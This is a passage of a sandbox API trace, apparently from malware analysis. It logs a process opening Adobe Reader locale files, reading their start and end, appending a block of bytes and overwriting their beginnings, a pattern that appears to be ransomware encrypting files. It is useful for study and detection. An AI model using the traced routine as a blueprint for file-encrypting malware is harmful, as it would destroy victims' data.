lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x331f28c*=0x8000, lpOverlapped=0x0) returned 1 [0078.702] CloseHandle (hObject=0x204) returned 1 [0078.703] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\makeaccessible.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\makeaccessible.cat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0078.703] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0078.703] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x13600 [0078.703] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0078.703] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0078.704] ReleaseMutex (hMutex=0x168) returned 1 [0078.704] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="makeaccessible.CAT", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0078.704] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="makeaccessible.CAT", cchWideChar=18, lpMultiByteStr=0x1f88b2c, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="makeaccessible.CAT", lpUsedDefaultChar=0x0) returned 18 [0078.704] ReadFile (in: hFile=0x204, lpBuffer=0x2663838, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x331f278*=0x4000, lpOverlapped=0x0) returned 1 [0078.709] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x12600 [0078.709] ReadFile (in: hFile=0x204, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0078.710] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x12600 [0078.710] WriteFile (in: hFile=0x204, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0078.711] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0078.711] WriteFile (in: hFile=0x204, lpBuffer=0x286cf58*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesWritten=0x331f28c*=0x4000, lpOverlapped=0x0) returned 1 [0078.711] CloseHandle (hObject=0x204) returned 1 [0078.711] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\Search.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\search.cat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0078.712] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0078.712] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x6000 [0078.712] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0078.712] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0078.713] ReleaseMutex (hMutex=0x168) returned 1 [0078.713] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Search.CAT", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0078.713] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Search.CAT", cchWideChar=10, lpMultiByteStr=0x1f7344c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Search.CAT", lpUsedDefaultChar=0x0) returned 10 [0078.713] ReadFile (in: hFile=0x204, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0078.738] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x5000 [0078.738] ReadFile (in: hFile=0x204, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0078.760] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x5000 [0078.761] WriteFile (in: hFile=0x204, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0078.761] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0078.761] WriteFile (in: hFile=0x204, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0078.761] CloseHandle (hObject=0x204) returned 1 [0078.761] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\Acroform.CZE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\cs_cz\\acroform.cze"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0078.762] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0078.762] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x63e00 [0078.762] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0078.763] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0078.763] ReleaseMutex (hMutex=0x168) returned 1 [0078.763] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Acroform.CZE", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.763] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Acroform.CZE", cchWideChar=12, lpMultiByteStr=0x1f735ac, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Acroform.CZE", lpUsedDefaultChar=0x0) returned 12 [0078.763] ReadFile (in: hFile=0x204, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x331f278*=0x8000, lpOverlapped=0x0) returned 1 [0078.820] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x62e00 [0078.820] ReadFile (in: hFile=0x204, lpBuffer=0x25ad0d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x25ad0d8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0078.875] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x62e00 [0078.875] WriteFile (in: hFile=0x204, lpBuffer=0x2669998*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2669998*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0078.876] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0078.876] WriteFile (in: hFile=0x204, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x331f28c*=0x8000, lpOverlapped=0x0) returned 1 [0078.877] CloseHandle (hObject=0x204) returned 1 [0079.066] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\EScript.CZE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\cs_cz\\escript.cze"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0079.067] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0079.067] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x9c00 [0079.067] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0079.067] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0079.067] ReleaseMutex (hMutex=0x168) returned 1 [0079.067] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EScript.CZE", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0079.067] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EScript.CZE", cchWideChar=11, lpMultiByteStr=0x1f735ec, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EScript.CZE", lpUsedDefaultChar=0x0) returned 11 [0079.067] ReadFile (in: hFile=0x1f0, lpBuffer=0x25a8048, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x25a8048*, lpNumberOfBytesRead=0x331f278*=0x4000, lpOverlapped=0x0) returned 1 [0079.124] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x8c00 [0079.125] ReadFile (in: hFile=0x1f0, lpBuffer=0x2691bb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0079.131] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x8c00 [0079.131] WriteFile (in: hFile=0x1f0, lpBuffer=0x26696c8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x26696c8*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0079.132] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0079.132] WriteFile (in: hFile=0x1f0, lpBuffer=0x2864a58*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesWritten=0x331f28c*=0x4000, lpOverlapped=0x0) returned 1 [0079.133] CloseHandle (hObject=0x1f0) returned 1 [0079.133] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\reflow.CZE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\cs_cz\\reflow.cze"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0079.134] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0079.134] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x1200 [0079.134] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0079.134] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0079.134] ReleaseMutex (hMutex=0x168) returned 1 [0079.134] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="reflow.CZE", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0079.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="reflow.CZE", cchWideChar=10, lpMultiByteStr=0x1f7360c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="reflow.CZE", lpUsedDefaultChar=0x0) returned 10 [0079.135] ReadFile (in: hFile=0x1f0, lpBuffer=0x1e965d8, nNumberOfBytesToRead=0x1200, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e965d8*, lpNumberOfBytesRead=0x331f2bc*=0x1200, lpOverlapped=0x0) returned 1 [0079.335] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0079.335] WriteFile (in: hFile=0x1f0, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1788, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x331f2d0*=0x1788, lpOverlapped=0x0) returned 1 [0079.335] CloseHandle (hObject=0x1f0) returned 1 [0079.336] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\WebLink.CZE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\cs_cz\\weblink.cze"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0079.336] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0079.336] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x6c00 [0079.336] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0079.336] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0079.336] ReleaseMutex (hMutex=0x168) returned 1 [0079.337] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WebLink.CZE", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0079.337] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WebLink.CZE", cchWideChar=11, lpMultiByteStr=0x1f7366c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WebLink.CZE", lpUsedDefaultChar=0x0) returned 11 [0079.337] ReadFile (in: hFile=0x1f0, lpBuffer=0x1e965d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1e965d8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0079.338] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x5c00 [0079.338] ReadFile (in: hFile=0x1f0, lpBuffer=0x1e965d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1e965d8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0079.339] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x5c00 [0079.339] WriteFile (in: hFile=0x1f0, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0079.340] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0079.340] WriteFile (in: hFile=0x1f0, lpBuffer=0x1e965d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e965d8*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0079.340] CloseHandle (hObject=0x1f0) returned 1 [0079.341] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\DVA.DAN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\da_dk\\dva.dan"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0079.341] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0079.341] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x4a00 [0079.341] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0079.341] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0079.341] ReleaseMutex (hMutex=0x168) returned 1 [0079.342] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DVA.DAN", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0079.342] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DVA.DAN", cchWideChar=7, lpMultiByteStr=0x1f7ab7c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DVA.DAN", lpUsedDefaultChar=0x0) returned 7 [0079.342] ReadFile (in: hFile=0x1f0, lpBuffer=0x1e965d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1e965d8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0079.349] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x3a00 [0079.349] ReadFile (in: hFile=0x1f0, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0079.353] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x3a00 [0079.353] WriteFile (in: hFile=0x1f0, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0079.354] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0079.354] WriteFile (in: hFile=0x1f0, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0079.354] CloseHandle (hObject=0x1f0) returned 1 [0079.355] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\RdLang32.DAN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\da_dk\\rdlang32.dan"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0079.356] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0079.356] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x144c00 [0079.356] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0079.356] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0079.356] ReleaseMutex (hMutex=0x168) returned 1 [0079.356] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RdLang32.DAN", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.356] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RdLang32.DAN", cchWideChar=12, lpMultiByteStr=0x1f7356c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RdLang32.DAN", lpUsedDefaultChar=0x0) returned 12 [0079.356] ReadFile (in: hFile=0x1f0, lpBuffer=0x2882db8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x331f278*=0xf000, lpOverlapped=0x0) returned 1 [0079.758] ReadFile (in: hFile=0x1f0, lpBuffer=0x2882db8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0079.760] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x143c00 [0079.760] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0079.774] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x143c00 [0079.774] WriteFile (in: hFile=0x1f0, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0079.775] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0079.775] WriteFile (in: hFile=0x1f0, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: 